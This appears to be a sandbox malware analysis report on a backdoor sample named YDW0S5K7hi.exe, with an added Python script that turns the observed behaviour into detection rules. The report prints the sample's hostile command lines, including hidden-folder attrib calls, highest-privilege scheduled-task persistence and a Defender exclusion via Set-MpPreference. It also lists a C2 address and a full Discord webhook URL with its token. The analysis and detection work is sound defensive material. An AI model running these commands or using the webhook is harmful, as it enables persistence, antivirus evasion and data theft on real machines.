                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match; File source: YDW0S5K7hi.exe, type: SAMPLE
Source: Yara match; File source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Memory allocated: CF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Memory allocated: 1B970000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Memory allocated: F20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Memory allocated: 1B710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Memory allocated: CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Memory allocated: 1B180000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3161
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6604
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe TID: 7912; Thread sleep count: 204 > 30
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe TID: 7920; Thread sleep count: 95 > 30
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe TID: 7624; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964; Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe TID: 6556; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; File Volume queried: C:\ FullSizeInformation
Source: $77HelpPanel.exe, 0000000A.00000002.2614465492.0000000001033000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: YDW0S5K7hi.exe, 00000000.00000002.1401926563.0000000000E69000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe; Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Queries volume information: C:\Users\user\Desktop\YDW0S5K7hi.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe; Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
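The "Process created" entries above are the host-side evidence a detection engineer turns into rules: attrib +s +h on a freshly created directory under AppData, cmd.exe running a .bat out of the user's Temp folder, schtasks /Create with /RL HIGHEST whose action points into a user-writable path or an unexpanded %MyFile% variable, and powershell.exe calling Set-MpPreference -ExclusionExtension. (The long sleeps listed above are the sandbox-evasion side: 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds, i.e. an indefinite wait.) The Python below is an added example, not part of the Joe Sandbox report or of the sample: it runs those rules over process-creation records constructed from the command lines listed above, plus two benign controls, and also handles the Base64 -EncodedCommand form of the same cmdlet. The task names in TASK_NAME_IOCS are taken from this report and are sample-specific; every other rule is generic, and the ProcessEvent shape (image, parent image, command line) mirrors a Sysmon Event ID 1 or Security 4688 record.

```python
"""Triage rules for the "Process created" command lines in this report.
Added example; not part of the Joe Sandbox report. The events below are
constructed from the report's command lines plus two benign controls."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the creating process
    command_line: str


# Directories a standard user can write to; a task action or hidden file there
# is the pattern the report shows (AppData\Roaming\...\comserver, Local\Temp).
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp)\\", re.I)
UNEXPANDED_VAR = re.compile(r"%[^%\s]+%")
# Task names taken from this report: sample-specific indicators, not generic rules.
TASK_NAME_IOCS = {"$77HelpPanel.exe", "HelpPanel_Task-DAILY-21PM"}


def encode_powershell_command(script: str) -> str:
    """Build the Base64 that powershell.exe -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded script when the command line uses -e/-enc/-EncodedCommand,
    otherwise the command line unchanged (invalid Base64 is left alone)."""
    m = re.search(r"(?<!\S)-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.I)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return cmdline


def switch_value(cmdline: str, switch: str) -> Optional[str]:
    """Value of a schtasks switch such as /TR or /TN: quoted (with \\" escapes) or bare."""
    m = re.search(switch + r'\s+(?:"((?:[^"\\]|\\.)*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def detect(ev: ProcessEvent) -> List[str]:
    """Names of every rule the event matches; an empty list means no finding."""
    hits: List[str] = []
    image = ev.image.rsplit("\\", 1)[-1].lower()
    cl = ev.command_line

    if image == "powershell.exe":
        script = decode_encoded_command(cl)
        if re.search(r"\bSet-MpPreference\b.*-Exclusion(?:Extension|Path|Process)", script, re.I):
            hits.append("defender_exclusion_added")
        if script != cl:
            hits.append("powershell_encoded_command")

    elif image == "schtasks.exe" and re.search(r"/create\b", cl, re.I):
        action = switch_value(cl, "/TR") or ""
        name = switch_value(cl, "/TN") or ""
        if re.search(r"/RL\s+HIGHEST\b", cl, re.I):
            hits.append("schtasks_create_highest_runlevel")
        if USER_WRITABLE.search(action):
            hits.append("schtasks_action_in_user_writable_path")
        if UNEXPANDED_VAR.search(action):
            hits.append("schtasks_action_unexpanded_env_var")
        if name in TASK_NAME_IOCS:
            hits.append("schtasks_name_matches_report_ioc")

    elif image == "attrib.exe" and re.search(r"\+h\b", cl) and USER_WRITABLE.search(cl):
        hits.append("attrib_hidden_in_user_writable_path")

    elif image == "cmd.exe" and re.search(r'/c\b.*\\Temp\\[^"]*\.(?:bat|cmd)\b', cl, re.I):
        hits.append("cmd_runs_temp_batch")

    return hits


def triage(events) -> List[tuple]:
    """(process, parent, hits) for every event that matched at least one rule."""
    out = []
    for ev in events:
        hits = detect(ev)
        if hits:
            out.append((ev.image.rsplit("\\", 1)[-1], ev.parent_image.rsplit("\\", 1)[-1], hits))
    return out


# Constructed from the report's "Process created" lines; the last event is a benign control.
DROPPER = r"C:\Users\user\Desktop\YDW0S5K7hi.exe"
SYS32 = r"C:\Windows\System32"
COMSERVER = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"
IMPLANT = COMSERVER + r"\$77HelpPanel.exe"
SAMPLE_EVENTS = [
    ProcessEvent(SYS32 + r"\attrib.exe", DROPPER, '"' + SYS32 + r'\attrib.exe" +s +h "' + COMSERVER + '"'),
    ProcessEvent(SYS32 + r"\attrib.exe", DROPPER, '"' + SYS32 + r'\attrib.exe" +s +h "' + IMPLANT + '"'),
    ProcessEvent(SYS32 + r"\cmd.exe", DROPPER,
                 r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""'),
    ProcessEvent(SYS32 + r"\timeout.exe", SYS32 + r"\cmd.exe", "timeout 3"),
    ProcessEvent(SYS32 + r"\schtasks.exe", IMPLANT, '"schtasks.exe" /query /TN $77HelpPanel.exe'),
    ProcessEvent(SYS32 + r"\schtasks.exe", IMPLANT,
                 '"schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "' + IMPLANT
                 + r' \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST'),
    ProcessEvent(SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", IMPLANT,
                 '"' + SYS32 + r'\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit'),
    ProcessEvent(SYS32 + r"\schtasks.exe", IMPLANT,
                 '"' + SYS32 + r'\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00'),
    ProcessEvent(SYS32 + r"\schtasks.exe", SYS32 + r"\cmd.exe",  # benign control (constructed)
                 r'schtasks.exe /Create /SC DAILY /TN "NightlyBackup" /TR "C:\Program Files\Backup\backup.exe" /ST 02:00'),
]

if __name__ == "__main__":
    for proc, parent, hits in triage(SAMPLE_EVENTS):
        print(f"{parent} -> {proc}: {', '.join(hits)}")
```

Run as a script it prints one line per matched parent/child pair. The two schtasks /query calls and timeout 3 produce no finding on their own; the signal is the combination from one parent, a highest-run-level task whose action lives under AppData, a second task pointing at an unexpanded %MyFile%, and a Defender extension exclusion, so a consumer of these rule names should correlate them per parent process rather than alert on each alone.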

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match; File source: YDW0S5K7hi.exe, type: SAMPLE
Source: Yara match; File source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; the numeric badge the report shows next to a matched technique is kept in brackets, entries without a number are the unmatched cells of the standard matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter [1]; Scheduled Task/Job [21]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scripting [1]; Scheduled Task/Job [21]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [11]; Scheduled Task/Job [21]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [111]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [11]; Process Discovery [1]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Input Capture [1]; Archive Collected Data [11]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel [11]; Non-Standard Port [1]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [3]; Application Layer Protocol [4]; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1555421; Sample: YDW0S5K7hi.exe; Start date: 13/11/2024; Architecture: WINDOWS; Score: 100

Start
  DNS/IP: time.windows.com; shed.dual-low.s-part-0017.t-0009.t-msedge.net; 2 other IPs or domains
  Signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
  +- YDW0S5K7hi.exe (started)
  |    Dropped: C:\Users\user\AppData\...\$77HelpPanel.exe (PE32+); C:\Users\user\AppData\...\YDW0S5K7hi.exe.log (CSV)
  |    Signatures: Uses cmd line tools excessively to alter registry or file data
  |    +- cmd.exe
  |    |    +- $77HelpPanel.exe
  |    |    |    DNS/IP: 109.120.138.54 (ports 49766, 49819, 49865; INFOBOX-ASInfoboxruAutonomousSystemRU, Russian Federation); discord.com 162.159.137.232 (ports 443, 49760; CLOUDFLARENETUS, United States)
  |    |    |    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules
  |    |    |    +- powershell.exe
  |    |    |    |    Signatures: Loading BitLocker PowerShell Module
  |    |    |    |    +- conhost.exe
  |    |    |    |    +- WmiPrvSE.exe
  |    |    |    +- schtasks.exe
  |    |    |    |    +- conhost.exe
  |    |    |    +- schtasks.exe
  |    |    |    |    +- conhost.exe
  |    |    |    +- 2 other processes
  |    |    |         +- conhost.exe
  |    |    |         +- conhost.exe
  |    |    +- conhost.exe
  |    |    +- timeout.exe
  |    +- attrib.exe
  |    |    +- conhost.exe
  |    +- attrib.exe
  |         +- conhost.exe
  +- $77HelpPanel.exe (started)

                  SourceDetectionScannerLabelLink
                  YDW0S5K7hi.exe61%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                  YDW0S5K7hi.exe100%AviraHEUR/AGEN.1313069
                  YDW0S5K7hi.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe100%AviraHEUR/AGEN.1313069
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe61%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://g.top4top.io/p_2522c7w8u1.png0%Avira URL Cloudsafe
                  https://g.top4top.io/p_2522c7w8u0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  discord.com
                  162.159.137.232
                  truefalse
                    high
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      time.windows.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPTfalse
                          high
Name | Source | Malicious | Antivirus Detection | Reputation
https://discord.com | $77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003A84000.00000004.00000800.00020000.00000000.sdmp | false | | high
